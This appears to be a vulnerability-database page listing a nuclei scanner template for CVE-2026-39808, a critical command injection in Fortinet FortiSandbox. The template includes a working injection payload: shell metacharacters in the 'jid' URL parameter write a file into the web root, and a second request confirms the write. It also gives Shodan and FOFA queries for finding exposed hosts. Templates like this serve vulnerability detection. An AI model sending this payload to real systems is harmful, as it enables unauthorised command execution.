Lucene search
K

Fortinet FortiSandbox - Command Injection

🗓️ 03 Jun 2026 06:04:49Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 15 Views

Fortinet FortiSandbox 4.4.0–4.4.8 has command injection; attackers can execute arbitrary code. Upgrade to 4.4.9+.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2026-39808
18 Apr 202609:15
githubexploit
GithubExploit
Exploit for OS Command Injection in Fortinet Fortisandbox
21 Apr 202622:21
githubexploit
Circl
CVE-2026-39808
14 Apr 202606:20
circl
CNNVD
Fortinet FortiSandbox 操作系统命令注入漏洞
14 Apr 202600:00
cnnvd
CVE
CVE-2026-39808
14 Apr 202615:38
cve
Cvelist
CVE-2026-39808
14 Apr 202615:38
cvelist
EUVD
EUVD-2026-22338
14 Apr 202618:30
euvd
NCSC
vulnerabilities in Fortinet FortiSandbox
15 Apr 202612:23
ncsc
NVD
CVE-2026-39808
14 Apr 202616:16
nvd
Packet Storm
📄 Fortinet FortiSandbox 4.4.8 Remote Command Execution
16 Apr 202600:00
packetstorm
Rows per page
id: CVE-2026-39808

info:
  name: Fortinet FortiSandbox - Command Injection
  author: DhiyaneshDk
  severity: critical
  description: |
    Fortinet FortiSandbox 4.4.0 through 4.4.8 contains a command injection caused by improper neutralization of special elements in OS commands, letting attackers execute unauthorized code or commands, exploit requires crafted input.
  impact: |
    Attackers can execute arbitrary code or commands, potentially leading to full system compromise.
  remediation: Upgrade FortiSandbox to version 4.4.9 or later.
  reference:
    - https://fortiguard.fortinet.com/psirt/FG-IR-26-100
    - https://nvd.nist.gov/vuln/detail/CVE-2026-39808
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-39808
    cwe-id: CWE-78
    epss-score: 0.25454
    epss-percentile: 0.96316
  metadata:
    verified: true
    max-request: 2
    vendor: fortinet
    product: fortisandbox
    shodan-query: http.title:"FortiSandbox"
    fofa-query: title="FortiSandbox"
  tags: cve,cve2026,fortisandbox,fortinet,rce,intrusive,file-upload

variables:
  string: "{{randstr}}"
  filename: "{{to_lower(rand_text_alpha(8))}}"

http:
  - raw:
      - |
        GET /fortisandbox/job-detail/tracer-behavior?jid=%7c%28echo+{{string}}+%3e+%2fweb%2fng%2f{{filename}}.txt%29%7c HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains(body, 'fortisandbox')"
        internal: true

  - raw:
      - |
        GET /ng/{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, '{{string}}')"
        condition: and
# digest: 4b0a0048304602210082a5db08bebdc37ed6e4ac358f60a74a69c826bf49a41a8cbd35fe42898915d5022100b07c2a4266a9b8ce1e2c12906a6823ce23f1fe947ca3e2215a87e28bc5ac82c3:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 Apr 2026 07:19Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.19.8
EPSS0.25454
SSVC
15